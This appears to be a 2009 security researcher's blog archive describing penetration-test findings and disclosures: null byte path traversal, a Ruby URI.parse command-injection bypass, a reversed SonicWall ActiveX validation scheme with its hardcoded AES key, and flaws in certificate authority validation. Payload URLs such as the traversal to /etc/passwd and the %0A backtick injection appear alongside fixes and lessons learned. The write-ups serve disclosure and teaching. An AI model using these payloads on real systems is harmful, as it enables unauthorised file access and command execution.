Friday, October 16, 2009

null byte injection



In this 2008 blog post, Portswigger says that null byte attacks against web applications are nothing new. It's almost 2010, and they're still nothin' new, but they sure can be fun!

During a recent web app assessment, I found one very similar to the example in Portswigger's post. I tampered with it a few times, but wasn't really sure if it was an exploitable condition or not.

I saw some requests containing a file name, similar to:
/servlet?file=image_N.jpg

I began trying some basic attacks, like:
/servlet?file=../../../../etc/passwd

These attacks always resulted in the application cleanly handling the exception, and giving me a friendly error message in an HTTP 200 response. Not quite ready to give up, I decided to try the following:

/servlet?file=../image_N.jpg

This also generated an error, but this time it was a 500 Internal Server Error from the application container. This meant that the validation routine was not necessarily aware of my ../'s, but was probably concerned with the format of the file name. To be sure, I tried the following:

/servlet?file=image_N.foo
/servlet?file=../image_N.foo

Both of the above requests generated the clean error message. Only when the string ended with _N.jpg did I get a 500 error, which told me that the logic was:

1. Validate that the file name extension is .JPG.
2. Validate that the file name is of the format image_N, where N is a random integer.
3. Try to read the JPEG from the file system.

This is great if you want to read JPEGs, but I had my heart set on arbitrary file access. So how do we bypass the _N.JPG filter? I pressed the Staples Easy Button on my desk and it injected a null byte like:

/servlet?file=../../../../etc/passwd%00image_N.jpg

After a number of attempts to determine the directory depth of the file system, I was happy to see the contents of the passwd file in my browser.
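To see why this works, here's a minimal sketch of the flawed check. The real application was a Java servlet, so this Ruby version (with made-up names and a guessed regex) is purely illustrative:

# Hypothetical reconstruction of the validation logic; I never saw the actual code.
def valid_image_name?(name)
  name =~ /image_\d+\.jpg\z/     # only scrutinizes the end of the string
end

valid_image_name?("../../../../etc/passwd\0image_1.jpg")   # => truthy

# The check passes, but the null byte truncates the path in the underlying
# native file APIs, so the server opens /etc/passwd instead of a JPEG.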

Then things got interesting . . .

This application had been pen-tested before. It had also been scanned using a popular commercial static analysis tool, and had gotten a clean bill of health. So, let's just say that management was a little, um, curious about why this bug was still alive and well. And by curious, I actually mean furious.

So what went wrong? After the first pen-test, the blatant directory traversal bug was "fixed" with a new validation routine that scrutinized the end of the file name. This new routine was declared as a validation routine in the static analysis tool, and any subsequent data flows that passed through it were considered safe. Game over. Hooray for tools!

Lessons Learned

Behind every tool is the person who wrote it, and the person operating it. These people are just as likely to make mistakes as the developer who wrote the target application. Once again, we're reminded that there is no silver security bullet. Tools help, but it comes down to proper education, process, and people to actually find and fix bugs.

Thursday, October 15, 2009

Mainlining new lines: feel the burn

Since the blog has been pretty stale for the last couple of months, I've decided to try and spice things up with a couple of war stories from recent web app pen tests. No XSS bugs here. I'm talking about complete, CPU melting, rack busting pwnage and destruction, shock and awe, all delivered over HTTP. OK, maybe I'm being a little dramatic, but at least they won't be XSS bugs. Besides, if you own the box, who needs XSS?

Command Execution in Ruby on Rails app

This RoR application was accepting a user-supplied URL which got passed to an external application via IO.popen(). If I could inject a back-tick or escape from the quoted string being passed to popen(), I could execute arbitrary commands. My problem was that these basic injection attacks were failing because the devs did a decent job of validating input. Part of the validation approach relied on passing the user-supplied data to Ruby's URI.parse() function. The parse() function would raise an exception any time I injected a "malicious" character, and the script would stop executing before calling popen().
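The pattern looked roughly like this. This is a sketch with made-up names, not the app's actual code, and the real quoting may have differed:

require 'uri'

def fetch(user_url)
  URI.parse(user_url)                                # validation: raises URI::InvalidURIError on most injected characters
  IO.popen("curl \"#{user_url}\"") { |io| io.read }  # the raw string is then interpolated into a shell command
end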

I knew I had to find some sort of filter bypass bug in URI.parse() if I wanted any pwnage, so I fired up irb and after a few manual fuzzing attempts I had it:

nullbyte:~ mikezusman$ ruby -v
ruby 1.9.1p243 (2009-07-16 revision 24175) [i386-darwin9.8.0]
nullbyte:~ mikezusman$ irb
>> require 'uri'
=> true
>> require 'cgi'
=> true
>> u1 = "http://www.google.com"
=> "http://www.google.com"
>> u2 = "http://www.google.com`ls`"
=> "http://www.google.com`ls`"
>> u3 = "http://www.google.com%0A`ls%0A`"
=> "http://www.google.com%0A`ls%0A`"
>> URI.parse(u1)
=> #<URI::HTTP:0x... URL:http://www.google.com>
>> URI.parse(u2)
URI::InvalidURIError: bad URI(is not URI?): http://www.google.com`ls`
from /System/Library/Frameworks/Ruby.framework/Versions/1.8/usr/lib/ruby/1.8/uri/common.rb:436:in `split'
from /System/Library/Frameworks/Ruby.framework/Versions/1.8/usr/lib/ruby/1.8/uri/common.rb:485:in `parse'
from (irb):7
from :0
>> URI.parse(u3)
URI::InvalidURIError: bad URI(is not URI?): http://www.google.com%0A`ls%0A`
from /System/Library/Frameworks/Ruby.framework/Versions/1.8/usr/lib/ruby/1.8/uri/common.rb:436:in `split'
from /System/Library/Frameworks/Ruby.framework/Versions/1.8/usr/lib/ruby/1.8/uri/common.rb:485:in `parse'
from (irb):8
from :0
>> URI.parse(CGI::unescape(u3))
=> #<URI::HTTP:0x... URL:http://www.google.com>
>> x = URI.parse(CGI::unescape(u3))
=> #<URI::HTTP:0x... URL:http://www.google.com>

Injecting a URL-encoded version (%0A) of a new line (\n) would get my URL-encoded back-tick (%60) through the URI.parse() function unscathed. After the successful call to parse(), the data was passed to popen() and my commands would be executed. My attack looked like:

http://victim.com/controller?param=http://www.google.com%0A%60ls%0A%60

Lessons Learned

Relying on the result of a call to a third party routine doesn't necessarily equate to "input validation." However, used differently, URI.parse() could have very easily helped to prevent this bug. URI.parse() returns a new object whose members could be used to construct a safe string to be passed to popen().
This would work because everything after the %0A gets dropped:

>> d = "http://www.google.com/%0A%60ls%0A%60"
=> "http://www.google.com/%0A%60ls%0A%60"
>> r = URI.parse(CGI::unescape(d))
=> #<URI::HTTP:0x... URL:http://www.google.com/>
>> r.path
=> "/"
>> new_arg = "#{r.scheme}://#{r.host}#{r.path}"
=> "http://www.google.com/"


If you relied on the above as "input validation", you would just have gotten lucky that the function chopped off everything after the new line. Sometimes luck is enough. But when dealing with user data being passed to a system command, a little extra scrutiny can go a long way towards protecting your application. URI.parse() makes it easier for us to enforce additional validation checks by letting us look at each piece of the URI (protocol/scheme, host, path).

When fetching user-supplied URIs, this sort of fine-grained input validation is something we should be doing anyway. For example, simply parsing the URI would not block an attack against the local host, since http://127.0.0.1/ is valid. We might also want to make sure that the protocol is http|https (not ftp, for example) and that our application isn't being used to scan the network on the inside of the firewall (by blacklisting internal IPs and host names).
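Here's a minimal sketch of what those extra checks might look like; the allow/deny lists are made up for illustration:

require 'uri'
require 'cgi'

ALLOWED_SCHEMES = %w[http https]
BLOCKED_HOSTS   = %w[localhost 127.0.0.1 intranet.example.com]

def safe_popen_arg(raw)
  uri = URI.parse(CGI::unescape(raw))     # still raises URI::InvalidURIError on junk
  return nil unless ALLOWED_SCHEMES.include?(uri.scheme.to_s.downcase)
  return nil if uri.host.nil? || BLOCKED_HOSTS.include?(uri.host.downcase)
  # rebuild the value from the parsed pieces instead of passing the raw input along
  "#{uri.scheme}://#{uri.host}#{uri.path}"
end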

Moral of the Story

Just like many other bugs, this one could have been prevented with better input validation. Even if you think you're doing a good job validating your input, remember that not all input validation routines are created equal. Stay tuned for my next post, where we'll explore the shortcomings of relying on static analysis tools to catch similar bugs.

Update 10/22/2009
@emerose filed this bug report.

Tuesday, August 4, 2009

BlackHat 2009 and Defcon 17: EV SSL MITM Demo

For the second year in a row I had BlackHat live demo issues. Shame on me.

Fortunately, the demo worked at Defcon. Had it not worked, however, I was prepared with a video thanks to Camtasia.

You can view the video here.

The demonstration shows a MITM using a regular SSL certificate (Domain Validated) to intercept data sent to a site protected with an Extended Validation (EV) SSL certificate. Since the browser treats the high-assurance EV certificate the same as a low-assurance DV certificate, the user is never warned about any connection downgrade. All they might notice is the "flicker" of the green EV badge.

Tuesday, June 16, 2009

Insecure Cookies and You: Perfect Together

Who uses the secure cookie flag? Web developers who don't want their users' cookies leaking out over non-SSL-protected sockets. These developers realize that protecting user credentials on the wire is only half the battle. If an attacker can sniff a user's cookie off the wire when it's sent in plain text, who cares if the credentials are protected? The attacker still gets access to the application.
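For example, a session cookie set with the flag looks something like this (name and value made up):

Set-Cookie: SESSIONID=d34db33f; path=/; Secure

A browser that honors the Secure attribute will only send that cookie back over HTTPS.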

Who doesn't use the secure flag? Yahoo! Mail. Microsoft Live Mail. GMail and Google apps. All of these sites, and many others, protect the transmission of credentials using HTTPS. Unfortunately, immediately after you authenticate to one of these sites and get a valid session cookie, the browser is redirected to a plain text HTTP interface of the site. Google at least gives users the option of protecting their entire session with SSL. Others do not. If these companies start setting the secure flag on their cookies, their sites will break.

The "Secure" cookie flag is just a patch for a poorly implemented browser Same Origin Policy. Essentially, it allows a web application to opt-in to a strict interpretation of SOP on the client side that will prevent cookies from being leaked over insecure protocols. Why do we have to do extra work to be secure?

I propose a new cookie flag, called the "insecure" flag. Use of the insecure flag would allow web sites that don't care about protecting session cookies to opt out of a strict interpretation of SOP, thus exposing their session cookies to the world and allowing their applications to work. If you want to protect your users' credentials over HTTPS, but then expose their sessions over HTTP, this will be the flag for you!

Imagine that. Secure by default. No extra work to do things right. What a concept!

Ah, wishful thinking :-)

Wednesday, June 3, 2009

NYS CSCIC Conference

Last week I presented at the NYS cyber security conference in Albany. My talk was about attacks that leverage publicly available information, such as data indexed in search engines and/or stored in social networks. I also showed how this data can be used in highly targeted spear phishing attacks. My spear phishing demo used my NetExtender SSL VPN exploit, since it is usually trivial to find a company's SSL VPN gateway. Once you find the SSL VPN gateway, some passive recon of the system can reveal a tremendous attack surface on the victim (client) machine.

At the end, I touched on some problems with commercial PKI, but I didn't really get into it. I'm saving that for some upcoming blog posts. I got some great feedback afterward, and also met a bunch of cool folks. Thanks for listening. Slides are available here.

I couldn't stick around for both days of talks, but I managed to see the two keynotes on day one. The second one was by Phil Reitinger, Deputy Under Secretary, National Protection and Programs Directorate (NPPD), U.S. Department of Homeland Security.

/me lets his fingers recover from typing that title

During his talk, Mr. Reitinger offered up five priorities for the US as we move forward with our new cyber security initiatives. I'm paraphrasing here, and I didn't take great notes. That's because I'm just some dude with a blog, and not a journalist.

1. We need to build our capacity. DHS needs people. We also need to work with academia to build programs that churn out people with the right skills and knowledge.

2. Establish relationships between public and private sector. Mr. Reitinger joked about the infinite loop of meetings where public & private sector folks agree that they are both willing to share data - starting at the next meeting.

3. Develop (and follow) a standard incident response & recovery plan.

4. Streamline Identity Management. In addition to managing user identities, he also mentioned something to the effect of "being able to better identify who we're connecting to." Maybe this means we'll eventually get something better than SSL site validation.

5. Metrics. Specifically, he mentioned software quality metrics. One thing that keeps popping into my head is the fact that the Air Force got a locked-down version of XP. How did the Air Force quantify the improved security? And when will everyone else benefit?

Tuesday, March 24, 2009

Subprime PKI and SSL Rebinding

I'm on my way out of Vancouver today after an awesome time at CanSecWest 2009. Met a lot of great people, and learned some cool new tech.

The talk Alex and I gave, "Subprime PKI: EV SSL certs and MD5 Collisions", was also well received. We'll be releasing our paper and source code soon, but until then, here is a screen shot of a MITM attack against an EV SSL protected web site from our live demo (note the presence of the "green glow" in the browser).

Thanks to Garett Gee for the photo. You can check out the rest of his photos here.

Thursday, February 26, 2009

Law.Com SSL VPN Article and Microsoft IAG Hands On Lab

Today I'm out to teach a Microsoft IAG Hands-On-Lab outside of Boston, Mass. It is a basic intro class to IAG, which is Microsoft's SSL VPN technology.

Also, last month Bryan Dykstra wrote a follow-up article about my SSL VPN research on Law.com. It's a good read, and provides a nice overview of some of the threats affecting these devices.

Monday, February 23, 2009

Reversing Crypto: SonicWall SSL VPN Flaw

Haroon Meer's SSL VPN ActiveX repurposing attack is number 9 on Jeremiah Grossman's list of the top 10 web hacks of 2008 :-) Congrats to Haroon! I figured this would be a good time to document the details of the SonicWALL flaw I discovered and disclosed last year at BlackHat. Some details are in the slides, but I've been meaning to put a detailed description here for some time. So here goes...

In the beginning, there was a flaw...

First, the initial flaw was VERY simple, and easy to exploit. Any web site could instantiate the ActiveX control (NELaunchCtrl), and the very first thing the control would do is send an HTTP request to the invoking server to determine if the control should upgrade itself. If the server sent back an unrecognized response, the control would download an unsigned .EXE file from the server and execute it on the client. To find the flaw, you simply had to intercept the ActiveX-initiated HTTP requests with an SSL-capable proxy, then replay and fuzz them.

This flaw was reported to SonicWALL (with a recommendation to use code signing certificates to prevent malicious code execution), and they eventually released a patch for me to test. This is when it got interesting.

Then, there was a patch...

Upon initial testing of the fixed control, the very basic repurposing attack was indeed thwarted. Further interception of the traffic generated by the control showed a series of challenge/response requests between the client and the server.

Example challenge:
https://sslvpn.server.com/cgi-bin/sslvpnclient?validateserver=128248573387261264

Example response (from HTTP response body):
SERVER_CHAIN="NjQ3MjZGNkM2OTZENkY2NzZGNjQ3MjY5NjM3MjYxNzM=";

VALIDATE_DATA="NEQ2NUQ1MzcwNDNBODhDRUFBMDgwMzMxNjAzRDhGQ0U4MDczRjQxOTNGQTdDODgzRUQ5RDdBQTAzQjg3QURFQg==";

Base64 decoding of the VALIDATE_DATA yielded binary data that had to be some sort of cipher text. SERVER_CHAIN, on the other hand, would reveal a stream of hex numbers that would eventually decode to a 16-byte string such as: drolimogodricras

These 16 bytes were unique for each validation request, as was the cipher text. Also interesting was the fact that the SERVER_CHAIN and VALIDATE_DATA were unique even when I replayed requests with the same value passed in validateserver.

At this point I knew I was dealing with a stream or block cipher, that SERVER_CHAIN held what seemed to be an initialization vector, and that VALIDATE_DATA held what seemed to be the cipher text. Now I just needed to find out what algorithm was being used and what the encryption key was.

No IDA Skills Required

Next, I started looking at the control itself. I knew there was a new method exposed named ValidateServer(). This method had to be called for the control to continue running, and this is also what triggered the challenge response. Before I jumped into IDA, I ran strings.exe on the binary. Below is what I saw.



In the above image there is a red circle and a red box. The red circle shows the following text: s)3!cW^L1%S&V@N~
It doesn't take much to realize that these 16 bytes look an awful lot like a passphrase.

In the red box, we see some encryption-related error messages that indicate the encryption method: AES128. For AES128, our 16-byte string above would be an acceptable passphrase. Remember that 16-byte string we assumed was an IV? Well, 16 bytes is the correct size for an AES128 IV.

Now we've identified all the key parts of the new server validation mechanism SonicWall implemented to attempt to defeat the repurposing of their ActiveX client by rogue sites.

1. The input is a unix timestamp generated by the client and sent to the server to be encrypted.
2. The server generates a pseudo-random IV and encrypts the timestamp with a symmetric encryption key that the client already knows. The IV and cipher text are sent back to the client.
3. The client receives the IV and the ciphertext, and attempts to decrypt the cipher text using the hardcoded, pre-shared encryption key.
4. If the decrypted plaintext matches what was originally sent by the client, validation succeeds and the control can be used (or attacked).
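Putting those pieces together, the client-side check boils down to something like the following Ruby sketch. The CBC mode and the use of the hardcoded string as the raw key are my assumptions (the real client is native code), but the sample values are the ones shown above:

require 'base64'
require 'openssl'

# the hardcoded 16-byte string pulled out of the binary with strings.exe
KEY = 's)3!cW^L1%S&V@N~'

# sample challenge/response values from above; both base64-wrap ASCII hex
server_chain  = Base64.decode64('NjQ3MjZGNkM2OTZENkY2NzZGNjQ3MjY5NjM3MjYxNzM=')
validate_data = Base64.decode64('NEQ2NUQ1MzcwNDNBODhDRUFBMDgwMzMxNjAzRDhGQ0U4MDczRjQxOTNGQTdDODgzRUQ5RDdBQTAzQjg3QURFQg==')

iv         = [server_chain].pack('H*')    # "drolimogodricras", 16 bytes
ciphertext = [validate_data].pack('H*')   # 32 bytes of cipher text

cipher = OpenSSL::Cipher.new('AES-128-CBC')
cipher.decrypt
cipher.key = KEY
cipher.iv  = iv
plaintext = cipher.update(ciphertext) + cipher.final
puts plaintext    # if the assumptions hold, this is the value the client sent to validateserver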

The Source Code

To repeat the repurposing attack, I wrote the following C# and ran it on my rogue server. Sorry for the screenshot, but I can't find the actual source file at the moment.



At least they didn't use ECB ;-)

Conclusion

For a second time, I reported everything above to SonicWALL. They patched again, and said they fixed it. However, the fix did not include the recommended mitigation of using code signing certificates to validate the .EXE that gets downloaded by the ActiveX control. That said, the control still relies on some sort of obfuscated client/server validation routine. That's bad news, since it can probably be broken again by someone with enough time on their hands. But then again, I wonder if they would have gotten a code signing certificate signed with an MD5 hash ;-) Security through obscurity FT(L|W)?

Monday, January 26, 2009

Top Web Hacking Techniques of 2008

Jeremiah has put out a request for the top web hacking techniques of 2008. This post serves to summarize my suggestion, which is ActiveX Repurposing attacks. These are attacks where malicious web sites abuse the functionality of ActiveX objects already installed on Windows machines, in order to download and execute code (among other things). No debugger necessary :-)

References:

1. An ActiveX Dropper described by Dean: Owning the Client without an Exploit

2. Sensepost Juniper SSL VPN ActiveX repurposing by Haroon: ActiveX Repurposing.. (aka: Other bugs your static analyzer will never find..) (aka 0day^H^H 485day bug!)

3. SonicWALL SSL VPN ActiveX repurposing by yours truly: Network World article
and SonicWALL announcement.

4. Hmm, I thought this was more recent, but it was actually from 2005 (read down in the wiki): Sony DRM Root Kit Scandal

Thursday, January 15, 2009

How do you trust?

SSL PKI is designed to do two things: encrypt data on the wire, and allow web site validation through the use of trusted third party signatures. The former works pretty well, the Debian weak key debacle aside. Unfortunately, the latter seems about as robust and secure as Windows 98. Case in point, https://discovercard.com. As my colleague Mike Walker points out, DiscoverCard.com forces users to enter credentials on a page served over an insecure HTTP connection. In doing so, Discover leaves users with no real way to tell who they are giving their credentials to. This is a perfect example of an implementation specific design flaw that fails open and renders SSL site validation useless.

Unfortunately, Discover Card isn't the only organization breaking PKI. The pillars of Internet security, our trusted third party Certificate Authorities, have been having a rough time recently. A number of implementation specific flaws at multiple CAs have allowed outsiders to abuse their systems and obtain certificates they are not authorized to hold. Sure, these implementation specific flaws can be fixed, but the lasting damage to the trust we have in PKI can't be undone. Further, the way these situations have been handled seems to only undermine whatever trust remains.

Last summer when I disclosed the details of how I got the live.com certificate to Microsoft, I told them I wasn't going to do anything bad with it, they said thanks, we shook hands, and that was pretty much the end of it. A few weeks ago, when Sotirov and crew disclosed that they derived their very own key capable of signing certificates that would be trusted by all web browsers, the researchers told Microsoft, Mozilla, etc, that they wouldn't do anything bad with it. These companies again said thanks, hands were shook, and that was pretty much the end of that.

We rely on WebTrust audits and other mechanisms to ensure that our commercial Certificate Authorities do their job well, and so we can be sure we're sending our data to the web sites we trust. Unfortunately, when the audits are useless and the Certificate Authorities screw up like they did in the above two scenarios, companies like Microsoft and Mozilla are forced to make a tough call:

Do they
a) Revoke the root CA for which a duplicate signing key was derived by unknown individuals, thus breaking the Internet for many businesses and individual users
or
b) Do nothing and trust that these guys really only have an expired certificate, and didn't generate one valid for the next couple of years since they so very easily could have.

In the end, the trust that backs PKI is replaced with the trust of a few select individuals at the organizations who manage our root certificate programs (a.k.a. the browser vendors). The millions of dollars spent on WebTrust audits are meaningless. The CAs could have just paid all of their money earmarked for audits to Sotirov and Appelbaum in exchange for their silence, and PKI would have lived to fall another day.

Burn your SSL Certificates?

PKI, while good on paper, is hard to implement securely. It has taken almost two decades for us to have web browsers that actually support the one method that PKI has to protect itself from rogue certificates: Certificate Revocation Lists. And it doesn't really matter, since not everyone is using IE7 or Firefox 3 yet. CRLs, which are essentially blacklists, are completely ineffective when you don't even know what rogue certificates are actually in existence.

I don't think trusted third parties are enough. We need technology that puts the ability to make trust decisions back in the hands of end users, rather than trying to make these decisions for them.

So what can we do differently? I'm of the mindset that client side certificate / public key caching, like that of SSH, can drastically improve our ability to make trust decisions when communicating on the Internet. SSH shows us that we can communicate securely without trusted third parties. The next question is how best to apply this to web browsers. Hashes of public keys are not easily consumed by casual Internet users. Another Intrepidus colleague, Aaron Rhodes, brought up the idea of vanity hashes that are actually easily recognizable patterns. This could help, but it would certainly complicate key management.
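To make that concrete, here's a rough Ruby sketch of the kind of fingerprint such a scheme would cache and compare (not the plug-in's actual code; the file name is made up):

require 'openssl'
require 'digest/sha1'

cert = OpenSSL::X509::Certificate.new(File.read('site.pem'))   # a previously saved certificate
fingerprint = Digest::SHA1.hexdigest(cert.public_key.to_der).scan(/../).join(':')
puts fingerprint    # compare against the cached value on each visit; alert the user if it changed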

In an effort to actually help make things better, rather than just ranting about how bad PKI is on this blog, I've been working on a plug-in for Firefox that lets users whitelist SSL public keys SSH-style and alerts them when the keys change. It is a lot harder than it would seem. In my next post, I'll talk more about this plug-in and the challenges I've faced in getting it working.

-schmoilito

(Cross post on blog.phishme.com)

Friday, January 2, 2009

A brief description of how to become a CA

Anyone can create a Certificate Authority. Check out this blog describing how to do it with OpenSSL.
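For example, something along these lines gives you a working root you can sign certificates with (file names and subject are arbitrary):

openssl genrsa -out ca.key 2048
openssl req -new -x509 -days 3650 -key ca.key -out ca.crt -subj "/CN=My Toy CA"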

Becoming a trusted CA is a different story. Microsoft, Mozilla, Apple, and other browser companies and OS vendors have a policy stating what it takes to participate in their root CA programs.

http://technet.microsoft.com/en-us/library/cc751157.aspx
http://www.apple.com/certificateauthority/ca_program.html
http://www.mozilla.org/projects/security/certs/policy/
http://www.opera.com/docs/ca/

Thursday, January 1, 2009

Nobody is perfect

Just before Christmas, an admin from the StartCom certificate authority disclosed that he was able to procure an SSL certificate for Mozilla.com from a registered agent of the CA Comodo. He was not authorized to obtain this certificate, and the RA and CA clearly failed to properly vet his cert signing request. Shame on Comodo. You can read the entire saga on mozilla.dev.tech.crypto.

The discussion resulting from StartCom's blog post is quite interesting, and touches on many issues, spanning from internal CA domain validation procedures to how to revoke a certificate in the Mozilla root cert program. One issue in particular is exactly what I talked about in my last post.

Frank Hecker, of the Mozilla Foundation, said "[right] now we have no real idea as to the extent of the problem (e.g., how many certs might have been issued without proper validation, how many of those were issued to malicious actors, etc.)."

When a flaw in a CA validation mechanism is uncovered, it can sometimes be trivial to fix. The hard part is determining whether any other certificates were obtained by taking advantage of the same flaw, and then revoking them. Although I can imagine a methodology for this process, I can't comment on how any given CA would actually tackle this problem. Based on my own application security experience, I will say that I'm sure lots of the logs that would need to be parsed might not actually exist.

One person who commented on the StartCom post that started all this critiqued it, saying it seemed dodgy that StartCom was blatantly pointing out flaws in a competing CA. The reader did, however, understand the severity of the problem that was found, and thanked StartCom for publicly disclosing it. I agree with the reader, and I think StartCom did a good thing in disclosing this bug.

So in the interest of full disclosure, here is what happened on Friday, December 19 (three days before the StartCom disclosure). I found a flaw in StartCom's domain validation mechanism that easily allowed anyone to authorize themselves for ANY domain name on various TLDs. While I only tested .COM, many other TLDs were available, including .GOV.
The screen shot above shows the domain names my StartCom account was allowed to create signed certificates for. These certificates would have been trusted by Firefox, but not Internet Explorer. The first one is a domain I control. Phishme.com and Intrepidusgroup.com are domains owned by my employer for which I am not an authorized contact, and for which I should not have been, but was, granted a signed certificate. Needless to say Paypal.com and Verisign.com are companies I'm also not authorized for.

Fortunately for Verisign and PayPal, a defense-in-depth strategy succeeded for StartCom. While I bypassed StartCom's domain validation process, my attempt to create a signed certificate for Verisign.com was flagged by a blacklist and not permitted. This is good news for the prominent sites on the blacklist, but bad news for lesser-known sites that rely on the trust gained by having a valid SSL certificate (small credit unions, for example).

Because they're a good CA, the StartCom team was immediately aware of my attempt to get a certificate for Verisign. I disclosed the details of the flaw to them, and the simple problem was fixed within hours. But the question remains: did anyone else take advantage of the flaw?

PKI is not a perfect system, and there is no perfect CA. But, there are at least two types of CAs. One type treats SSL certificates as a cash cow, pushing signed certificates out the door, and counting the money. The second type is like StartCom. This second type understands that trust comes before money and that trusted CAs are a critical piece of Internet infrastructure.

(cross post on PhishMe)